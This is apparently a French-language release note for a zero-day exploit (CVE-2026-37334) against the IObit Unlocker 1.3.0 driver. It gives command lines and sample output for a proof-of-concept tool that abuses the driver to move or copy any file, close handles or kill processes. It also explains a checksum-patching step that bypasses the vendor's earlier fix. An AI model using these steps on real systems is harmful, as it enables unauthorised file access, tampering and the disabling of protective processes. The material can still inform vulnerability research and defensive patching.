
(0 day) CVE-2026-37334 Déplace ou copie n'importe quel fichier. Contourne le correctif précédent grâce à une astuce de somme de contrôle. IObit Unlocker v. 1.3.0
(0 day) Déplace ou copie n'importe quel fichier. Contourne le correctif précédent grâce à une astuce de somme de contrôle.
Article : https://nathan2.com/files/iobit.pdf Informations générales : https://nathan2.com/posts/iobit/
J'ai découvert cela sans savoir qu'un autre exploit existait déjà et avait été découvert avant. Cependant, celui-ci contourne le correctif apporté par IObit. Fonctionne dans la version 1.3.0
Utilisation :
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe "C:\copied.txt" "C:\t.txt" 4 1
--- Envoi de la requête ---
Source : C:\copied.txt
Destination : C:\t.txt
Sous-type : 4 | Indicateurs : 1
IOCTL réussi. Le pilote a renvoyé 4 octets.
Vérification : le fichier cible existe/est accessible.
Plus d'indicateurs :
Utilisation : UnlockerCLI.exe <CheminSource> <CheminDest> <Sous-type> <Indicateurs>
Exemple : UnlockerCLI.exe "C:\Chemin Avec Espace\fichier.txt" "C:\sauvegarde\fichier.txt" 3 (sous-type) 5 (indicateur d'opération)
Sous-types : (au moins ceux que j'utilise) 3=déplacer, 4=copier
Indicateurs d'opération : 0=Ne pas supprimer le handle, 1 = supprimer les handles, 2 = tuer les processus avec des handles, 4 = tuer les processus et supprimer les handles, 5??? expérimental.
L'exécutable joint devrait être fonctionnel et déjà corrigé. Sinon, lisez ci-dessous.
Utilisez le correcteur de somme de contrôle pour corriger le PoC. Comme ceci :
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\checksumpatcher.exe C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe
Taille du fichier d'origine : 235449 octets
Somme alternée actuelle : 11044471
Somme XOR actuelle : 43
Le fichier possède déjà les bonnes sommes de contrôle. Aucune modification nécessaire.
Cela permettra à l'exécutable de communiquer avec le pilote IObitUnlocker.